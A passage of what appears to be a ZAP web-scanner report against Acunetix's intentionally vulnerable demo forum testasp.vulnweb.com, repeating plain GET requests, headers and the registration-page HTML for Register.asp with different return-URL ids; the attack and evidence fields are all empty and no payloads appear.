</tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=70 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D70" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=71 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D71" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=72 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D72" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=73 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D73" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=74 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D74" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=75 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=76 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" 